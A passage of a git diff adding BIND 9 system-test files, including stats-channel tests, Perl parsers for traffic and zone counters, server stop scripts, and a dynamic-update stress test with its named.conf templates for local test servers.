"http://{}:{}/xml/v3/zones".format(statsip, statsport), timeout=600 + ) + assert r.status_code == 200 + + root = ET.fromstring(r.text) + + default_view = None + for view in root.find("views").iter("view"): + if view.attrib["name"] == "_default": + default_view = view + break + assert default_view is not None + + return default_view.find("zones").findall("zone") + + +def fetch_traffic_xml(statsip, statsport): + def load_counters(data): + out = {} + for counter in data.findall("counter"): + out[counter.attrib["name"]] = int(counter.text) + + return out + + r = requests.get( + "http://{}:{}/xml/v3/traffic".format(statsip, statsport), timeout=600 + ) + assert r.status_code == 200 + + root = ET.fromstring(r.text) + + traffic = {} + for ip in ["ipv4", "ipv6"]: + for proto in ["udp", "tcp"]: + proto_root = root.find("traffic").find(ip).find(proto) + for counters in proto_root.findall("counters"): + if counters.attrib["type"] == "request-size": + key = "dns-{}-requests-sizes-received-{}".format(proto, ip) + else: + key = "dns-{}-responses-sizes-sent-{}".format(proto, ip) + + values = load_counters(counters) + traffic[key] = values + + return traffic + + +def load_timers_xml(zone, primary=True): + name = zone.attrib["name"] + + loaded_el = zone.find("loaded") + assert loaded_el is not None + loaded = datetime.strptime(loaded_el.text, generic.fmt) + + expires_el = zone.find("expires") + refresh_el = zone.find("refresh") + if primary: + assert expires_el is None + assert refresh_el is None + expires = None + refresh = None + else: + assert expires_el is not None + assert refresh_el is not None + expires = datetime.strptime(expires_el.text, generic.fmt) + refresh = datetime.strptime(refresh_el.text, generic.fmt) + + return (name, loaded, expires, refresh) + + +def load_zone_xml(zone): + name = zone.attrib["name"] + + return name + + +def test_zone_timers_primary_xml(statsport): + generic.test_zone_timers_primary( + fetch_zones_xml, + load_timers_xml, + statsip="10.53.0.1", + statsport=statsport, + zonedir="ns1", + ) + + +def test_zone_timers_secondary_xml(statsport): + generic.test_zone_timers_secondary( + fetch_zones_xml, + load_timers_xml, + statsip="10.53.0.3", + statsport=statsport, + zonedir="ns3", + ) + + +def test_zone_with_many_keys_xml(statsport): + generic.test_zone_with_many_keys( + fetch_zones_xml, load_zone_xml, statsip="10.53.0.2", statsport=statsport + ) + + +def test_traffic_xml(named_port, statsport): + generic_dnspython = pytest.importorskip("generic_dnspython") + generic_dnspython.test_traffic( + fetch_traffic_xml, statsip="10.53.0.2", statsport=statsport, port=named_port + ) diff --git a/bin/tests/system/statschannel/traffic-json.pl b/bin/tests/system/statschannel/traffic-json.pl new file mode 100644 index 0000000..353d6c7 --- /dev/null +++ b/bin/tests/system/statschannel/traffic-json.pl @@ -0,0 +1,49 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# traffic-json.pl: +# Parses the JSON version of the RSSAC002 traffic stats into a +# normalized format. + +use JSON; + +my $file = $ARGV[0]; +open(INPUT, "<$file"); +my $text = do{local$/;<INPUT>}; +close(INPUT); + +my $ref = decode_json($text); + +my $tcprcvd = $ref->{traffic}->{"dns-tcp-requests-sizes-received-ipv4"}; +my $type = "tcp request-size "; +foreach $key (keys %{$tcprcvd}) { + print $type . $key . ": ". $tcprcvd->{$key} ."\n"; +} + +my $tcpsent = $ref->{traffic}->{"dns-tcp-responses-sizes-sent-ipv4"}; +my $type = "tcp response-size "; +foreach $key (keys %{$tcpsent}) { + print $type . $key . ": ". $tcpsent->{$key} ."\n"; +} + +my $udprcvd = $ref->{traffic}->{"dns-udp-requests-sizes-received-ipv4"}; +my $type = "udp request-size "; +foreach $key (keys %{$udprcvd}) { + print $type . $key . ": ". $udprcvd->{$key} ."\n"; +} + +my $udpsent = $ref->{traffic}->{"dns-udp-responses-sizes-sent-ipv4"}; +my $type = "udp response-size "; +foreach $key (keys %{$udpsent}) { + print $type . $key . ": ". $udpsent->{$key} ."\n"; +} diff --git a/bin/tests/system/statschannel/traffic-xml.pl b/bin/tests/system/statschannel/traffic-xml.pl new file mode 100644 index 0000000..5552cc5 --- /dev/null +++ b/bin/tests/system/statschannel/traffic-xml.pl @@ -0,0 +1,46 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# traffic-xml.pl: +# Parses the XML version of the RSSAC002 traffic stats into a +# normalized format. + +use XML::Simple; + +my $file = $ARGV[0]; + +my $ref = XMLin($file); + +my $udp = $ref->{traffic}->{ipv4}->{udp}->{counters}; +foreach $group (@$udp) { + my $type = "udp " . $group->{type} . " "; + if (exists $group->{counter}->{name}) { + print $type . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n"; + } else { + foreach $key (keys %{$group->{counter}}) { + print $type . $key . ": ". $group->{counter}->{$key}->{content} ."\n"; + } + } +} + +my $tcp = $ref->{traffic}->{ipv4}->{tcp}->{counters}; +foreach $group (@$tcp) { + my $type = "tcp " . $group->{type} . " "; + if (exists $group->{counter}->{name}) { + print $type . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n"; + } else { + foreach $key (keys %{$group->{counter}}) { + print $type . $key . ": ". $group->{counter}->{$key}->{content} ."\n"; + } + } +} diff --git a/bin/tests/system/statschannel/traffic.expect.1 b/bin/tests/system/statschannel/traffic.expect.1 new file mode 100644 index 0000000..5938d5d --- /dev/null +++ b/bin/tests/system/statschannel/traffic.expect.1 @@ -0,0 +1,2 @@ +tcp request-size 16-31: 1 +tcp response-size 64-79: 1 diff --git a/bin/tests/system/statschannel/traffic.expect.2 b/bin/tests/system/statschannel/traffic.expect.2 new file mode 100644 index 0000000..6c9e25a --- /dev/null +++ b/bin/tests/system/statschannel/traffic.expect.2 @@ -0,0 +1,4 @@ +tcp request-size 16-31: 1 +tcp response-size 64-79: 1 +udp request-size 48-63: 1 +udp response-size 112-127: 1 diff --git a/bin/tests/system/statschannel/traffic.expect.4 b/bin/tests/system/statschannel/traffic.expect.4 new file mode 100644 index 0000000..3f892f5 --- /dev/null +++ b/bin/tests/system/statschannel/traffic.expect.4 @@ -0,0 +1,5 @@ +tcp request-size 16-31: 1 +tcp response-size 64-79: 1 +udp request-size 48-63: 2 +udp response-size 112-127: 1 +udp response-size 848-863: 1 diff --git a/bin/tests/system/statschannel/traffic.expect.5 b/bin/tests/system/statschannel/traffic.expect.5 new file mode 100644 index 0000000..15911b1 --- /dev/null +++ b/bin/tests/system/statschannel/traffic.expect.5 @@ -0,0 +1,7 @@ +tcp request-size 16-31: 1 +tcp request-size 48-63: 1 +tcp response-size 112-127: 1 +tcp response-size 64-79: 1 +udp request-size 48-63: 2 +udp response-size 112-127: 1 +udp response-size 848-863: 1 diff --git a/bin/tests/system/statschannel/traffic.expect.6 b/bin/tests/system/statschannel/traffic.expect.6 new file mode 100644 index 0000000..73fc8f1 --- /dev/null +++ b/bin/tests/system/statschannel/traffic.expect.6 @@ -0,0 +1,8 @@ +tcp request-size 16-31: 1 +tcp request-size 48-63: 2 +tcp response-size 112-127: 1 +tcp response-size 64-79: 1 +tcp response-size 848-863: 1 +udp request-size 48-63: 2 +udp response-size 112-127: 1 +udp response-size 848-863: 1 diff --git a/bin/tests/system/statschannel/zones-json.pl b/bin/tests/system/statschannel/zones-json.pl new file mode 100644 index 0000000..9eec9db --- /dev/null +++ b/bin/tests/system/statschannel/zones-json.pl @@ -0,0 +1,37 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# zones-json.pl: +# Parses the JSON version of the dnssec sign stats for the +# "dnssec" zone in the default view into a normalized format. + +use JSON; + +my $file = $ARGV[0]; +my $zone = $ARGV[1]; +open(INPUT, "<$file"); +my $text = do{local$/;<INPUT>}; +close(INPUT); + +my $ref = decode_json($text); + +my $dnssecsign = $ref->{views}->{_default}->{zones}[$zone]->{"dnssec-sign"}; +my $type = "dnssec-sign operations "; +foreach $key (keys %{$dnssecsign}) { + print $type . $key . ": ". $dnssecsign->{$key} ."\n"; +} +my $dnssecrefresh = $ref->{views}->{_default}->{zones}[$zone]->{"dnssec-refresh"}; +my $type = "dnssec-refresh operations "; +foreach $key (keys %{$dnssecrefresh}) { + print $type . $key . ": ". $dnssecrefresh->{$key} ."\n"; +} diff --git a/bin/tests/system/statschannel/zones-xml.pl b/bin/tests/system/statschannel/zones-xml.pl new file mode 100644 index 0000000..be86852 --- /dev/null +++ b/bin/tests/system/statschannel/zones-xml.pl @@ -0,0 +1,40 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# zones-xml.pl: +# Parses the XML version of the dnssec sign stats for the +# "dnssec" zone in the default view into a normalized format. + +use XML::Simple; + +my $file = $ARGV[0]; +my $zone = $ARGV[1]; + +my $ref = XMLin($file); + +my $counters = $ref->{views}->{view}->{_default}->{zones}->{zone}->{$zone}->{counters}; + +foreach $group (@$counters) { + + my $type = $group->{type}; + + if ($type eq "dnssec-sign" || $type eq "dnssec-refresh") { + if (exists $group->{counter}->{name}) { + print $type . " operations " . $group->{counter}->{name} . ": " . $group->{counter}->{content} . "\n"; + } else { + foreach $key (keys %{$group->{counter}}) { + print $type . " operations " . $key . ": ". $group->{counter}->{$key}->{content} ."\n"; + } + } + } +} diff --git a/bin/tests/system/stop.pl b/bin/tests/system/stop.pl new file mode 100644 index 0000000..6783b85 --- /dev/null +++ b/bin/tests/system/stop.pl @@ -0,0 +1,292 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# Framework for stopping test servers +# Based on the type of server specified, signal the server to stop, wait +# briefly for it to die, and then kill it if it is still alive. +# If a server is specified, stop it. Otherwise, stop all servers for test. + +use strict; +use warnings; + +use Cwd ':DEFAULT', 'abs_path'; +use English '-no_match_vars'; +use Getopt::Long; + +# Usage: +# perl stop.pl [--use-rndc [--port port]] test [server] +# +# --use-rndc Attempt to stop the server via the "rndc stop" command. +# +# --port port Only relevant if --use-rndc is specified, this sets the +# command port over which the attempt should be made. If +# not specified, port 9953 is used. +# +# test Name of the test directory. +# +# server Name of the server directory. + +my $usage = "usage: $0 [--use-rndc [--halt] [--port port]] test-directory [server-directory]"; + +my $use_rndc = 0; +my $halt = 0; +my $rndc_port = 9953; +my $errors = 0; + +GetOptions( + 'use-rndc!' => \$use_rndc, + 'halt!' => \$halt, + 'port=i' => \$rndc_port + ) or die "$usage\n"; + +my ( $test, $server_arg ) = @ARGV; + +if (!$test) { + die "$usage\n"; +} + +# Global variables +my $topdir = abs_path($ENV{'SYSTEMTESTTOP'}); +my $testdir = abs_path($topdir . "/" . $test); + +if (! -d $testdir) { + die "No test directory: \"$testdir\"\n"; +} + +if ($server_arg && ! -d "$testdir/$server_arg") { + die "No server directory: \"$testdir/$server_arg\"\n"; +} + +my $RNDC = $ENV{RNDC}; + +my @ns; +my @ans; + +if ($server_arg) { + if ($server_arg =~ /^ns/) { + push(@ns, $server_arg); + } elsif ($server_arg =~ /^ans/) { + push(@ans, $server_arg); + } else { + print "$0: ns or ans directory expected"; + print "I:$test:failed"; + } +} else { + # Determine which servers need to be stopped for this test. + opendir DIR, $testdir or die "unable to read test directory: \"$test\" ($OS_ERROR)\n"; + my @files = sort readdir DIR; + closedir DIR; + + @ns = grep /^ns[0-9]*$/, @files; + @ans = grep /^ans[0-9]*$/, @files; +} + +# Stop the server(s), pass 1: rndc. +if ($use_rndc) { + foreach my $name(@ns) { + stop_rndc($name, $rndc_port); + } + + @ns = wait_for_servers(30, @ns); +} + +# Pass 2: SIGTERM +foreach my $name (@ns) { + stop_signal($name, "TERM"); +} + +@ns = wait_for_servers(60, @ns); + +foreach my $name(@ans) { + stop_signal($name, "TERM", 1); +} + +@ans = wait_for_servers(1200, @ans); + +# Pass 3: SIGABRT +foreach my $name (@ns) { + print "I:$test:$name didn't die when sent a SIGTERM\n"; + stop_signal($name, "ABRT"); + $errors = 1; +} +foreach my $name (@ans) { + print "I:$test:$name didn't die when sent a SIGTERM\n"; + stop_signal($name, "ABRT", 1); + $errors = 1; +} + +exit($errors); + +# Subroutines + +# Return the full path to a given server's lock file. +sub server_lock_file { + my ( $server ) = @_; + + return if (defined($ENV{'CYGWIN'}) && $ENV{'CYGWIN'}); + + return $testdir . "/" . $server . "/named.lock" if ($server =~ /^ns/); + return if ($server =~ /^ans/); + + die "Unknown server type $server\n"; +} + +# Return the full path to a given server's PID file. +sub server_pid_file { + my ( $server ) = @_; + + return $testdir . "/" . $server . "/named.pid" if ($server =~ /^ns/); + return $testdir . "/" . $server . "/ans.pid" if ($server =~ /^ans/); + + die "Unknown server type $server\n"; +} + +# Read a PID. +sub read_pid { + my ( $pid_file ) = @_; + + return unless -f $pid_file; + # we don't really care about the race condition here + my $result = open(my $fh, "<", $pid_file); + if (!defined($result)) { + print "I:$test:$pid_file: $!\n"; + unlink $pid_file; + return; + } + + my $pid = <$fh>; + return unless defined($pid); + + chomp($pid); + return $pid; +} + +# Stop a named process with rndc. +sub stop_rndc { + my ( $server, $port ) = @_; + my $n; + + if ($server =~ /^ns(\d+)/) { + $n = $1; + } else { + die "unable to parse server number from name \"$server\"\n"; + } + + my $ip = "10.53.0.$n"; + if (-e "$testdir/$server/named.ipv6-only") { + $ip = "fd92:7065:b8e:ffff::$n"; + } + + my $how = $halt ? "halt" : "stop"; + + # Ugly, but should work. + system("$RNDC -c ../common/rndc.conf -s $ip -p $port $how | sed 's/^/I:$test:$server /'"); + return; +} + +sub server_died { + my ( $server, $signal ) = @_; + + print "I:$test:$server died before a SIG$signal was sent\n"; + $errors = 1; + + my $pid_file = server_pid_file($server); + unlink($pid_file); + + return; +} + +sub send_signal { + my ( $signal, $pid, $ans ) = @_; + + if (! defined $ans) { + $ans = 0; + } + + my $result = 0; + + if (!$ans && ($^O eq 'cygwin' || $^O eq 'msys')) { + my $killout = `/bin/kill -f -$signal $pid 2>&1`; + chomp($killout); + $result = 1 if ($killout eq ''); + } else { + $result = kill $signal, $pid; + } + return $result; +} + +# Stop a server by sending a signal to it. +sub stop_signal { + my ( $server, $signal, $ans ) = @_; + if (! defined $ans) { + $ans = 0; + } + + my $pid_file = server_pid_file($server); + my $pid = read_pid($pid_file); + + return unless defined($pid); + + # Send signal to the server, and bail out if signal can't be sent + if (send_signal($signal, $pid, $ans) != 1) { + server_died($server, $signal); + return; + } + + return; +} + +sub pid_file_exists { + my ( $server ) = @_; + + my $pid_file = server_pid_file($server); + my $pid = read_pid($pid_file); + + return unless defined($pid); + + # If we're here, the PID file hasn't been cleaned up yet + if (send_signal(0, $pid) == 0) { + # XXX: on windows this is likely to result in a + # false positive, so don't bother reporting the error. + if (!defined($ENV{'CYGWIN'}) || !$ENV{'CYGWIN'}) { + print "I:$test:$server crashed on shutdown\n"; + $errors = 1; + } + return; + } + + return $server; +} + +sub lock_file_exists { + my ( $server ) = @_; + my $lock_file = server_lock_file($server); + + return unless defined($lock_file) && -f $lock_file; + + return $server; +} + +sub wait_for_servers { + my ( $timeout, @servers ) = @_; + + while ($timeout > 0 && @servers > 0) { + sleep 1 if (@servers > 0); + @servers = + grep { defined($_) } + map { pid_file_exists($_) || lock_file_exists($_) } @servers; + $timeout--; + } + + return @servers; +} diff --git a/bin/tests/system/stop.sh b/bin/tests/system/stop.sh new file mode 100755 index 0000000..d01ca1d --- /dev/null +++ b/bin/tests/system/stop.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP="$(cd -P -- "$(dirname -- "$0")" && pwd -P)" +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" +export SYSTEMTESTTOP + +$PERL "$SYSTEMTESTTOP/stop.pl" "$@" diff --git a/bin/tests/system/stopall.sh b/bin/tests/system/stopall.sh new file mode 100644 index 0000000..0d63ecf --- /dev/null +++ b/bin/tests/system/stopall.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Stop all hanging processes from any system tests. +# + +SYSTEMTESTTOP=. +. $SYSTEMTESTTOP/conf.sh + +for d in $SUBDIRS +do + $SHELL stop.sh $d +done diff --git a/bin/tests/system/stress/clean.sh b/bin/tests/system/stress/clean.sh new file mode 100644 index 0000000..4833fa7 --- /dev/null +++ b/bin/tests/system/stress/clean.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f ns?/zone*.bk + +rm -f ns2/zone0*.db +rm -f ns2/zone0*.jnl +rm -f */named.memstats +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns*/named.run +rm -f ns*/named.conf diff --git a/bin/tests/system/stress/ns2/named.conf.in b/bin/tests/system/stress/ns2/named.conf.in new file mode 100644 index 0000000..607e0b5 --- /dev/null +++ b/bin/tests/system/stress/ns2/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + dnssec-validation no; + notify yes; +}; + +zone "zone000000.example" { + type primary; + allow-update { any; }; + file "zone000000.example.db"; +}; + +zone "zone000001.example" { + type primary; + allow-update { any; }; + file "zone000001.example.db"; +}; + +zone "zone000002.example" { + type primary; + allow-update { any; }; + file "zone000002.example.db"; +}; + +zone "zone000003.example" { + type primary; + allow-update { any; }; + file "zone000003.example.db"; +}; + +zone "zone000004.example" { + type primary; + allow-update { any; }; + file "zone000004.example.db"; +}; diff --git a/bin/tests/system/stress/ns2/zone.template.db b/bin/tests/system/stress/ns2/zone.template.db new file mode 100644 index 0000000..7ca1cc3 --- /dev/null +++ b/bin/tests/system/stress/ns2/zone.template.db @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns2 hostmaster 1 300 120 3600 86400 +@ NS ns2 + NS ns3 + NS ns4 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 +ns4 A 10.53.0.4 + +$GENERATE 0-999 name${0,6} A 10.0.0.1 diff --git a/bin/tests/system/stress/ns3/named.conf.in b/bin/tests/system/stress/ns3/named.conf.in new file mode 100644 index 0000000..7a568d6 --- /dev/null +++ b/bin/tests/system/stress/ns3/named.conf.in @@ -0,0 +1,74 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +server 10.53.0.4 { + provide-ixfr no; +}; + +server 10.53.0.2 { + request-ixfr no; +}; + +zone "zone000000.example" { + type secondary; + file "zone000000.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000001.example" { + type secondary; + file "zone000001.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000002.example" { + type secondary; + file "zone000002.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000003.example" { + type secondary; + file "zone000003.example.bk"; + primaries { 10.53.0.2; }; +}; + +zone "zone000004.example" { + type secondary; + file "zone000004.example.bk"; + primaries { 10.53.0.2; }; +}; diff --git a/bin/tests/system/stress/ns4/named.conf.in b/bin/tests/system/stress/ns4/named.conf.in new file mode 100644 index 0000000..26296f5 --- /dev/null +++ b/bin/tests/system/stress/ns4/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +controls { /* empty */ }; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dnssec-validation yes; + notify yes; +}; + +zone "zone000000.example" { + type secondary; + file "zone000000.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000001.example" { + type secondary; + file "zone000001.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000002.example" { + type secondary; + file "zone000002.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000003.example" { + type secondary; + file "zone000003.example.bk"; + primaries { 10.53.0.3; }; +}; + +zone "zone000004.example" { + type secondary; + file "zone000004.example.bk"; + primaries { 10.53.0.3; }; +}; diff --git a/bin/tests/system/stress/prereq.sh b/bin/tests/system/stress/prereq.sh new file mode 100644 index 0000000..aa97ae2 --- /dev/null +++ b/bin/tests/system/stress/prereq.sh @@ -0,0 +1,31 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if test -n "$PYTHON" +then + if $PYTHON -c "import dns" 2> /dev/null + then + : + else + echo_i "This test requires the dnspython module." >&2 + exit 1 + fi +else + echo_i "This test requires Python and the dnspython module." >&2 + exit 1 +fi + +exit 0 diff --git a/bin/tests/system/stress/setup.sh b/bin/tests/system/stress/setup.sh new file mode 100644 index 0000000..a19b4a1 --- /dev/null +++ b/bin/tests/system/stress/setup.sh @@ -0,0 +1,25 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +cp ns2/zone.template.db ns2/zone000000.example.db +cp ns2/zone.template.db ns2/zone000001.example.db +cp ns2/zone.template.db ns2/zone000002.example.db +cp ns2/zone.template.db ns2/zone000003.example.db +cp ns2/zone.template.db ns2/zone000004.example.db + +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf diff --git a/bin/tests/system/stress/tests_stress_update.py b/bin/tests/system/stress/tests_stress_update.py new file mode 100644 index 0000000..638cda0 --- /dev/null +++ b/bin/tests/system/stress/tests_stress_update.py @@ -0,0 +1,77 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +import concurrent.futures +import os +import subprocess +import time +import dns.query +import dns.update + + +def rndc_loop(test_state, server): + rndc = os.getenv("RNDC") + port = os.getenv("CONTROLPORT") + + cmdline = [ + rndc, + "-c", + "../common/rndc.conf", + "-p", + port, + "-s", + server, + "reload", + ] + + while not test_state["finished"]: + subprocess.run(cmdline, check=False) + time.sleep(1) + + +def update_zone(test_state, zone, named_port): + server = "10.53.0.2" + for i in range(1000): + if test_state["finished"]: + return + update = dns.update.UpdateMessage(zone) + update.add(f"dynamic-{i}.{zone}", 300, "TXT", f"txt-{i}") + try: + response = dns.query.udp(update, server, 10, named_port) + assert response.rcode() == dns.rcode.NOERROR + except dns.exception.Timeout: + print(f"error: query timeout for {zone}") + + print(f"Update of {server} zone {zone} successful") + + +# If the test has run to completion without named crashing, it has succeeded. +def test_update_stress(named_port): + test_state = {"finished": False} + + with concurrent.futures.ThreadPoolExecutor() as executor: + executor.submit(rndc_loop, test_state, "10.53.0.3") + + updaters = [] + for i in range(5): + zone = f"zone00000{i}.example." + updaters.append(executor.submit(update_zone, test_state, zone, named_port)) + + # All the update_zone() tasks are expected to complete within 5 + # minutes. If they do not, we cannot assert immediately as that will + # cause the ThreadPoolExecutor context manager to wait indefinitely; + # instead, we first signal all tasks that it is time to exit and only + # check whether any task failed to finish within 5 minutes outside of + # the ThreadPoolExecutor context manager. + unfinished_tasks = concurrent.futures.wait(updaters, timeout=300).not_done + test_state["finished"] = True + + assert not unfinished_tasks diff --git a/bin/tests/system/stub/clean.sh b/bin/tests/system/stub/clean.sh new file mode 100644 index 0000000..504df03 --- /dev/null +++ b/bin/tests/system/stub/clean.sh @@ -0,0 +1,23 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after stub tests. +# +rm -f dig.out.ns[35] ns3/child.example.st +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* +rm -f ns5/example.db diff --git a/bin/tests/system/stub/knowngood.dig.out.norec b/bin/tests/system/stub/knowngood.dig.out.norec new file mode 100644 index 0000000..ca0e458 --- /dev/null +++ b/bin/tests/system/stub/knowngood.dig.out.norec @@ -0,0 +1,21 @@ + +; <<>> DiG 8.2 <<>> -p @10.53.0.3 +norec data.child.example txt +; (1 server found) +;; res options: init defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 216 +;; flags: qr ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; data.child.example, type = TXT, class = IN + +;; AUTHORITY SECTION: +child.example. 5M IN NS ns2.child.example. + +;; ADDITIONAL SECTION: +ns2.child.example. 5M IN A 10.53.0.2 + +;; Total query time: 3 msec +;; FROM: draco to SERVER: 10.53.0.3 +;; WHEN: Wed Jun 21 10:58:37 2000 +;; MSG SIZE sent: 36 rcvd: 70 + diff --git a/bin/tests/system/stub/knowngood.dig.out.rec b/bin/tests/system/stub/knowngood.dig.out.rec new file mode 100644 index 